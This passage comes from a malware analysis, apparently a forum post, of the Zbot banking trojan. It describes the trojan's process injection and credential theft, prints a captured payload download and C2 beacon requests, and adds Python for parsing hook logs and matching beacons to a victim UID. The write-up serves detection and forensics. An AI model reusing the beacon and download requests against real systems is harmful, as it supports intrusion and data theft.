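        d = m.groupdict()
        d["pid"] = int(d["pid"])
        d["addr"] = int(d["addr"], 16)
        entries.append(d)
    return entries


def hooks_by_process(entries):
    """Group hooks by pid: {pid: {"process": path, "apis": set, "addrs": set}}."""
    out = {}
    for e in entries:
        rec = out.setdefault(e["pid"], {"process": e["process"], "apis": set(), "addrs": set()})
        rec["apis"].add(e["api"])
        rec["addrs"].add(e["addr"])
    return out


def hook_address_spans(entries):
    """Lowest and highest hook target per pid. A span of a few KB for all of a
    process's hooks points at one injected region rather than separate patches."""
    return {pid: (min(rec["addrs"]), max(rec["addrs"]))
            for pid, rec in hooks_by_process(entries).items()}


def hook_purposes(entries):
    """Map each pid to the sorted list of purposes implied by its hooked exports."""
    out = defaultdict(set)
    for e in entries:
        func = e["api"].split("!", 1)[-1]
        out[e["pid"]].add(API_PURPOSE.get(func, "unknown: " + func))
    return {pid: sorted(p) for pid, p in out.items()}


if __name__ == "__main__":
    ents = parse_gmer_iat(SAMPLE_GMER)
    groups = hooks_by_process(ents)
    for pid, (lo, hi) in hook_address_spans(ents).items():
        print(f"pid {pid} {groups[pid]['process']}: {len(groups[pid]['apis'])} hooked "
              f"APIs, targets {lo:08X}-{hi:08X}, {hook_purposes(ents)[pid]}")
```

Run against the full log above, the same parser shows the hooks in services.exe, lsass.exe, svchost.exe, Explorer.EXE and alg.exe each clustering within a few KB of one base per process, and the same six exports hooked again and again, which is the signature of one injected module rather than many independent modifications.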

<h4>
Notes
</h4>
Trojan-Spy.Win32.Zbot.ajd is a rootkit / banking trojan that
  • may disable the firewall. (1)
  • steals sensitive financial data (credit card numbers, online banking login details).
  • makes screen snapshots.
  • downloads additional components.
  • provides remote access to the compromised system.
  • previous versions were able to send out spam with their built-in SMTP engine.
The dropper starts by injecting code into winlogon.exe when executed. (2)
New memory pages are created in several exe files.
  • %System%\services.exe
  • %System%\lsass.exe
  • %System%\svchost.exe
  • %System%\smss.exe
rjyabu.bin is requested from the internet by svchost.exe, which will also listen for inbound connections. rjyabu.bin is then renamed to %System%\sysproc64\sysproc86.sys.
CODE
GET /htyyfqltnt/rjyabu.bin HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: domain12.net
Pragma: no-cache

HTTP/1.1 200 OK
Date: Mon, 25 Aug 2008 19:31:24 GMT
Server: Apache/2.2.9 (Debian) mod_fastcgi/2.4.6 PHP/5.2.6-2 with Suhosin-Patch
Last-Modified: Mon, 18 Aug 2008 04:31:06 GMT
ETag: "e888f0-49ff-454b4708d5680"
Accept-Ranges: bytes
Content-Length: 18943
Connection: close
Content-Type: application/octet-stream
The infection creates a mutex under the winlogon process, and we also see sysproc32.sys and sysproc86.sys loaded under winlogon.exe.
A mutex is also created under one of the svchost processes.
The trojan will report back information to a server, using the unique identifier.

CODE
POST /nenfptdc/s.php?1=%computername%_0001480c&i=MAIN
POST /nenfptdc/s.php?2=%computername%_0001480c&n=0&v=16842752&i=MAIN&s=0&sp=0&lcp=0&pr=0
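As an added example (not part of the original post), the following Python parses request lines like the two POSTs above and the earlier GET for rjyabu.bin, pulls the fields out of the beacon query string, and matches the UID carried in the query against the UID recorded in the registry; the comparison is case-insensitive because the registry shows the suffix as 0001480C while the beacon sends 0001480c. The request lines and the registry UID are constructed from the values in the report.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample request lines, taken from the report above, plus one benign
# request for contrast. (The report shows the Host header as domain12.net.)
SAMPLE_REQUESTS = [
    "POST /nenfptdc/s.php?1=%computername%_0001480c&i=MAIN",
    "POST /nenfptdc/s.php?2=%computername%_0001480c&n=0&v=16842752&i=MAIN&s=0&sp=0&lcp=0&pr=0",
    "GET /htyyfqltnt/rjyabu.bin HTTP/1.0",
    "GET /index.html HTTP/1.0",
]

# UID as recorded under ...\Windows NT\CurrentVersion\Network "UID" in the report.
REGISTRY_UID = "%computername%_0001480C"

# '<computername>_<8 hex digits>', the UID format described in the Technical details.
UID_RE = re.compile(r"^(?P<host>.+)_(?P<suffix>[0-9A-Fa-f]{8})$")


def parse_request_line(line):
    """Split 'METHOD /path?query [HTTP/x.y]' into (method, path, flat query dict)."""
    parts = line.split()
    method, target = parts[0], parts[1]
    split = urlsplit(target)
    # parse_qs leaves the literal "%computername%" alone: "%co" is not a valid escape.
    query = {k: v[0] for k, v in parse_qs(split.query, keep_blank_values=True).items()}
    return method, split.path, query


def uid_in_query(query):
    """First query value that looks like a victim UID, or None."""
    for value in query.values():
        if UID_RE.match(value):
            return value
    return None


def beacons_for_uid(lines, registry_uid):
    """Request lines whose query carries the given UID (case-insensitive match)."""
    hits = []
    for line in lines:
        _, _, query = parse_request_line(line)
        uid = uid_in_query(query)
        if uid is not None and uid.lower() == registry_uid.lower():
            hits.append(line)
    return hits


def beacon_fields(line):
    """The key/value pairs a beacon reports (i, n, v, s, sp, lcp, pr in the sample)."""
    return parse_request_line(line)[2]


def downloaded_binaries(lines):
    """Paths of GET requests for .bin files, like the rjyabu.bin download above."""
    paths = []
    for line in lines:
        method, path, _ = parse_request_line(line)
        if method == "GET" and path.lower().endswith(".bin"):
            paths.append(path)
    return paths


if __name__ == "__main__":
    for hit in beacons_for_uid(SAMPLE_REQUESTS, REGISTRY_UID):
        print("beacon:", beacon_fields(hit))
    print("binary downloads:", downloaded_binaries(SAMPLE_REQUESTS))
```

Fed with request lines from a proxy log, `beacons_for_uid` ties outbound traffic back to the specific host whose registry holds that UID, which is the practical use of the identifier the report describes.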
______________________________

(1) After a reboot the firewall might be completely disabled, and when I wanted to enable the different components again I was denied access.
(2) If for one reason or another the infection can't perform some tasks, you might get a forced reboot initiated by NT AUTHORITY\SYSTEM.
Thx fly out to Cretemonster for the dropper.